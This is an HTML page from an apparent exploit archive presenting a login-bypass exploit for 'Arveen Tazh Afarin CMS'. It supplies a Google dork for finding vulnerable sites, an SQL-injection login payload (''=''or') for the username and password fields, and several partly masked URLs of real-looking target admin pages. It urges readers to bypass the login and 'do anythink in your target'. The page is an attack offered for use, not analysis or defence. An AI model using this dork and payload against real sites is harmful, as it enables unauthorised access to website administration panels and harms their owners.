<html>
    <head>
        <link rel="shortcut icon" href="https://mr-msa.xyz/IMG/icon.png" type="image/x-icon">
        <style>
            html
            {
                background-color:black;
            }
            pre
            {
                color:green;
                font-size:11pt;
            }
            a
            {
                text-decoration:none;
            }
            button
            {
                background-color:green;
                width:200px;
                height:40px;
                color:#FFF;
                border:1px solid #999;
                border-radius:4px;
                
            }
            .back
            {
                width:60px;
            }
        </style>
        <title>exploit-49</title>
    </head>
    <body>
        <center>
                <a  href="exploit-49" download>
                    <button>
                    Download
                    </button>
                </a>
                <a href="../database">
                    <button class="back">
                    Back
                    </button>
                </a>
        </center>
        <pre>
########################################################
# Exploit Title: Arveen Tazh Afarin CMS Login page Bypass Vulnerability
########################################################
# Google Dork: intext:Powered &amp; design by ARVEEN TAZH AFARIN
# Date: [08/11/2015]
# Exploit Author: Guardiran Security Team =&gt;DeMoN
# Vendor Homepage: [http://arveentazh.en.ec21.com/]
# Software Link: [-]
# Version: All Version
# Tested on: [Win 8.1/Google chrome]
# CVE : [-]
########################################################
# DISCRIPTION: Hello Guys.You Have To Enter This Dork And Bypass The Login Page And Do Anythink In Your Target.
########################################################
# 'Username : '=''or
#
# 'Password : '=''or
#######################################################
# Demo:
# http://roudbaXrak.com/modir.php
# http://ariasaXyan.ir/modir.php
# http://atouXrs.ir/modir.php
########################################################
# Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T
# We Are Guardiran Security Team
# Discovered By:DeMoN########################################################        </pre>
    </body>
</html>